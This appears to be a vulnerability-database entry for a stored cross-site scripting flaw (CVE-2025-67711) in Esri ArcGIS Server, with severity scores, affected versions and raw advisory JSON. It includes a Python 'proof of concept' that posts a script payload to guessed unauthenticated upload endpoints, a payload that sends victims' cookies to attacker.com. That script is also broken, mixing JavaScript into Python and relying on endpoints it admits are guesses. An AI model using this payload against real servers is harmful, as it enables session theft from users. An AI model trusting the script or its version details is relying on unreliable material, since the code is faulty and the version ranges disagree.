Security Vulnerability Report
中文
CVE-2025-67711 CVSS 6.1 MEDIUM

CVE-2025-67711

Published: 2025-12-31 23:15:42
Last Modified: 2026-01-06 19:03:35

Description

There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Esri ArcGIS Server 11.4
Esri ArcGIS Server 11.3
Esri ArcGIS Server 11.2
Esri ArcGIS Server 11.1
Esri ArcGIS Server 11.0
Esri ArcGIS Server 10.9.1及更早版本 (Windows/Linux)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-67711 PoC - Stored XSS in Esri ArcGIS Server # Target: Esri ArcGIS Server 11.4 and earlier TARGET = "https://target-arcgis-server.com" XSS_PAYLOAD = '<script>document.location="https://attacker.com/log?c=' + 'cookie=' + document.cookie + '</script>' def exploit_stored_xss(): """ Exploit stored XSS vulnerability in ArcGIS Server file upload functionality. Note: This PoC demonstrates the attack concept; actual exploitation requires identifying the specific vulnerable endpoint. """ # Step 1: Identify vulnerable file upload endpoint upload_endpoints = [ f"{TARGET}/arcgis/rest/services/upload", f"{TARGET}/server/admin/uploads", f"{TARGET}/arcgis/sharing/rest/content/features/generate" ] # Step 2: Prepare malicious file with XSS payload files = { 'file': ('malicious.html', XSS_PAYLOAD, 'text/html') } # Step 3: Upload malicious file (unauthenticated) for endpoint in upload_endpoints: try: response = requests.post(endpoint, files=files, timeout=10) if response.status_code == 200: print(f"[+] File uploaded successfully to {endpoint}") print(f"[+] Payload: {XSS_PAYLOAD}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_vulnerability(): """ Verify if the XSS payload was stored and is executable. """ # Check if uploaded file is accessible check_urls = [ f"{TARGET}/arcgis/sharing/rest/content/items/malicious.html", f"{TARGET}/server/data/malicious.html" ] for url in check_urls: try: response = requests.get(url, timeout=10) if XSS_PAYLOAD in response.text: print(f"[+] XSS vulnerability confirmed at {url}") return True except: pass return False if __name__ == "__main__": print("CVE-2025-67711 PoC - Esri ArcGIS Server Stored XSS") print("=" * 50) exploit_stored_xss() verify_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67711", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:42.413", "lastModified": "2026-01-06T19:03:34.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser."}, {"lang": "es", "value": "Hay un problema de scripting entre sitios almacenado en Esri ArcGIS Server 11.4 y versiones anteriores en Windows y Linux que en algunas configuraciones permite a un atacante remoto no autenticado almacenar archivos que contienen código malicioso que puede ejecutarse en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}